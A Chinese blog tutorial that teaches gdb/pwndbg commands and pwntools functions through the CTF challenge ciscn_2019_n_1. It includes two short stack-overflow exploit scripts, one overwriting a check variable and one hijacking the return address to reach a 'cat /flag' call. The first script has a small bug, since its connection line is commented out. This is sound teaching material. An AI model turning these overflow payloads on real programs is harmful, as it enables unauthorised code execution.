以题目:ciscn_2019_n_1来详细学习dbg和pwntools

已于 2024-01-28 19:43:33 修改
阅读量1k 收藏 23
点赞数 29
分类专栏: pwn从0到1 文章标签: 学习
于 2024-01-21 14:24:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73985089/article/details/135728385
版权

我们在做Linux平台下的pwn题目的时候,调试是必不可少的一步,在调试的过程中找到漏洞并用pwntools写出攻击脚本。
对于很多新手来说,Linux下的调试,也就是gdb的使用不是很熟悉,今天,我们就通过一道题目来详细学习dbg和pwntools的使用:
题目来自buuctf,pwn方向,ciscn_2019_n_1。

gdb:

我们在Linux平台下调试的时候,可以使用原生的dbg,但是很多师傅说原生的gdb用起来不是很舒服,所以我就也用的pwndbg插件。

  • 插件安装方法:(这里我使用的是Ubuntu18)
    git clone https://github.com/pwndbg/pwndbg
    cd pwndbg
    ./setup.sh

1.调试程序:

gdb 文件名
调试文件

2.给程序下断点:

首先,我们可以到IDA中找到想要下断点的地址,或者直接下载main函数也可以:
下断点
这里注意,如果要在地址上下断点,格式为:b *地址要注意这里的*符号

3.运行程序

我们在做题的时候,可以先运行,看看程序大概流程,或者说下了断点之后,要运行到断点
start:执行到入口点函数(各种main函数)
run:运行到第一个断点处,如果没有断点,则直接跑完程序
c(Continue):继续运行
这里还要注意,如果在程序运行中使用start,则将重启程序

4.查看

我们在调试的时候,经常需要查看寄存器,地址或者查看断点,我们使用i命令:
i b:查看断点
i $eax:查看eax寄存器的值
查看断点
除此之外,我们还能够使用x来查看指定内存/寄存器:
x/20b $eax:查看,20字节,以byte形式,eax地址
chakan
这里要注意一下附加参数:

  1. i:反汇编
  2. b:byte形式
  3. w:word形式
  4. g:8字节形式
  5. s:以字符串形式显示

5.断点相关:

我们在调试的时候肯定需要下断点和取消断点操作
b *地址:在指定地址上下断点
i b:查看所有断点
d 序号:去掉指定序号的断点
disable 序号:禁用断点
enable 序号:启用断点
断点相关

6.反汇编:

disassemble:例如说:disassemble $rip:从rip开始反汇编
反汇编

7.执行:

单步执行:ni
单步步入:si
执行到函数返回:finish

8.最常用的指令:set(设置内存/寄存器的值)

例:set *地址 = 值
修改内存值
可以看到,这里成功修改了内存的值。

pwntools:

这里来简单介绍一下pwntools的使用:
from pwn import*:引入pwn库中的函数、
remote("ip:,port):远程连接
process():打开新的进程
gdb.attach():将进程附加到gdb

  • 发送相关:
    send():发送数据
    sendline():发送数据,并进行换行(末尾加上’\0’)
    sendafter(string,payload):在接收到string之后,发送数据
    sendlineafter(string,payload):在接收到string之后,发送数据,加上换行
  • 接收相关
    recv(n):接收n个字符
    recgline():接收一行输出
    recvlines(n):接收n行输出
    recvuntil(string):接收到string字符串为止
  • ELF相关
    symbols['function']:找到function函数的地址
    got['function']:找到function的got表项地址
    plt['function']:找到function的plt表项的地址

ciscn_2019_n_1:

我们来通过这道题,看一下这道题:
我们首先来静态分析:
静态分析
可以看到,这里程序的大致流程是:输出字符串,提示用户输入,用户输入,判断某个地址的值,然后分支进行执行,而且这里有后门函数,这就是非常简单的题目。
我们来通过动态调试看看,我们将断点设置在get函数之前,查看栈上的情况:
这里给出详细的过程:

  1. gdb ciscn_2019_n_1
  2. b *0x400691
  3. run
    1
    2
    可以看到,这里是将一个缓冲区的地址给到了rax(lea rax,[rbp - 0x10]),然后调用get函数
    我们来看看栈上的情况:
    3
    可以看到,这个缓冲区下面就是rbp,然后是返回地址,我们可以做到流程劫持
    我们再来看看静态分析:
    4
    我们可以看到,这里可以直接执行命令cat /flag,方式为:
    比较var_4的值,然后可以通过跳转执行,但是这个var_4是输入缓冲区的后面几个字节,我们将后面几个字节设置为预设的值,我们就可以让命令执行,拿到flag。
    所以这里就发现有两种:1.通过栈溢出劫持返回地址,2.通过输入最后的几个字节,让跳转不执行,从而执行命令cat /flag

1.通过覆盖var_4:

我们只要将var_4覆盖为41348000h即可通过验证,从而执行cat /flag,但是这里有00,我们无法输入,这时我们就要使用pwntools脚本完成了:

写出来的脚本:

from pwn import *
#io = remote("node5.buuoj.cn",26117)
payload = b'A'*(0x30 - 4) + p64(0x41348000)
io.recvuntil("number.\n")
io.sendline(payload)
io.interactive()

我们通过python解释器执行:
flag
可以看到我们已经拿到了flag

2.通过流程劫持

我们也可以通过栈溢出,直接覆盖返回地址,将rip指向execve(“cat /flag”),直接执行
编写脚本:

from pwn import *
#io = process("./ciscn_2019_n_1")
io = remote("node5.buuoj.cn",29936)
payload = b'A'*0x38 + p64(0x4006BE)
io.sendline(payload)
io.interactive()

flag
至此,gdb的使用和pwntools的使用就讲完了,当然,他们的高级使用远远不止这些,师傅们可以自行探索,如果在题目过程中有不理解的地方,可以私信我,当然,如果文章中有错误,还是希望大家指正,大家一起进步!!!

Shad0w-2023
关注
  • 29
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
x64_dbg.zip
06-02
x64_dbg
【CTF】ciscn_2019_n_1和pwn1_sctf_2016--栈溢出
最新发布
qq_48201589的博客
04-14 231
BUUICTF的ciscn_2019_n_1和pwn1_sctf_2016--栈溢出类型解题思路
dbg_new.rar_dbg_new.zip
09-20
C++内存泄漏检测原理+实例源码下载,是一个跨平台的C++ 内存泄漏检测器的源程序,一个主要缺陷是不支持多线程。分配内存时不进行文件名复制,而只是保存其指针;效率较高(编译debug_new.cpp
uart.rar_UART -DBG
09-24
通过出口实验,进一步熟悉了异步通讯,也对此单片机有了进一步的了解。
ciscn_2019_s_9
z1r0的博客
12-28 1107
ciscn_2019_s_9 查看保护 妥妥的shellcode题目 溢出,返回到s地址处的shellcode。给了一个hint,借助jmp esp这个跳板让eip成功执行到shellcode。 shellcode大小要小于0x20即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('nod
ciscn_2019_en_3
z1r0的博客
02-11 1234
ciscn_2019_en_3 查看保护 漏洞点的话出在id这里还有一个uaf。id这里借助read的不加00的特性来输出libc。 uaf这个漏洞直接用tcache double free来打就行,改hook为one_gadget即可getshell。具体的tcache攻击细节见z1r0’s blog from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug
ciscn_2019_n_5
z1r0的博客
12-05 1101
ciscn_2019_n_5 查看保护 没有nx,应该就是写shellcode了。有读、写、执行的权限 把shellcode写到name中,然后溢出,rop一下,返回到name就可以执行shellcode了。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 2
openswan协商流程之(一):main_outI1()
遇见你是我最美丽的意外
05-20 5758
主模式第一包:main_outI1() 1. 序言 main_outI1()作为主模式主动发起连接请求的核心处理函数,我们可以通过学习该函数的处理流程来探究openswan中报文封装的基本思想。如果之前没有学习基本的函数接口(如in_struct, out_struct, out_sa等),那么直接学习main_outI1()流程是比较困难的。如果想快速学习这几个函数接口,可以查看我先前的文章,我把需要的基本知识、思想等做了基本介绍,看完那几个接口再来学习此后的ISAKMP协商流程会容易很多,起到事半功倍的
dbg_new.rar_dbg_new
09-24
C++内存泄漏检测原理+实例源码下载,是一个跨平台的C++ 内存泄漏检测器的源程序,一个主要缺陷是不支持多线程。分配内存时不进行文件名复制,而只是保存其指针;效率较高(编译debug_new.cpp
amd64_edac_dbg.rar_V2
09-23
Distributed under the GNU public license, v2. driver for Linux.
x64_dbg_2019-04-17官方中文
04-19
x64_dbg是一款windows系统下非常优秀的32位和64位调试器,与目前热门的“OllyDbg”十分相似,使用过OllyDbg调试工具的朋友应该很容易上手操作。软件具有简洁的界面以及强大的功能,提供了类似C的表达式解析器、全...
scsi_dbg.rar_V2
09-21
AFS File Server client stubs for Linux v2.13.6.
dhd_dbg.rar_V2
09-20
brcmf debugfs init( for Linux v2.13.6.
编译问题处理:undefined symbol: OPENSSL_init_crypto
And乔的博客
10-13 6402
编译问题处理:undefined symbol: OPENSSL_init_crypto 结论: Python 2.7 编译_hashlib.so 提示undefined symbol: OPENSSL_init_crypto问题; 原因为openssl版本不匹配,所需要的symbol在该版本库中没有实现; 针对于本次问题,将openssl version 配置为1.0.1f 并将其关联库删除后重新编译,编译通过(PS:这里需要注意编译时实际使用的lib库的路径,避免出现版本安装为1.0.1f后相关库仍使用
openswan协商流程之(二):main_inI1_outR1()
遇见你是我最美丽的意外
05-20 5178
主模式第二包:main_inI1_outR1() 1. 序言 main_inI1_outR1()函数是ISAKMP协商过程中第二包的核心处理函数,同时也是响应端口的首包。这里我们主要说明main_inI1_outR1的处理流程,关于main_inI1_outR1的上下文环境暂不叙述,留给后面的文章进行更新。 ISAKMP协商报文的处理流程都比较复杂,一个函数有几百行都是很常见的,因此个人学习期间难免有遗漏和理解错误的地方,请大家多多批评指正。 2. main_inI1_outR1()处理流程图 3. m
2021_09_15_ciscn_2019_n_1
m0_51187558的博客
09-15 2716
ciscn_2019_n_1 前言 每日一题pwn方向的第二题。也是初入漏洞利用的一道特别基础的题。 大家都应该尝试着做过了上一道,也就是test your nc。从解法来说其实那道题的难度真的只是半脚踩在入门的门坎上。就像wp中所说的那样,目前pwn题的核心是通过漏洞挖掘与利用来提权,而nc这道题可以说是不需要任何漏洞的挖掘与利用,做出这道题并不代表你已经入门pwn了。 虽然如此,从ciscn_2019_n_1这道题开始,我们真正要开始尝试迈过pwn题的那一道门槛,面对一些简单的漏洞进行利用了。 做题流程
memcpy_dbg
09-22
memcpy_dbg是C/C++中的函数,用于在调试期间进行内存拷贝操作。它类似于memcpy函数,但会提供更多的调试信息以帮助定位内存错误。 memcpy_dbg函数的原型如下: void* memcpy_dbg(void* destination, const void* source, size_t num, const char* file, int line); 该函数的参数包括目标内存地址destination,源内存地址source,要拷贝的字节数num,以及调用该函数的文件名file和行号line。它返回一个指向目标内存地址的指针。 在调试过程中,memcpy_dbg函数会检查源和目标内存之间的重叠情况,并生成警告消息。这有助于避免潜在的缓冲区溢出或内存访问错误。 请注意,memcpy_dbg函数是特定于某些编译器的扩展,不是C标准库的一部分。它通常在调试模式下使用,并且可能会影响程序的性能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shad0w-2023

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值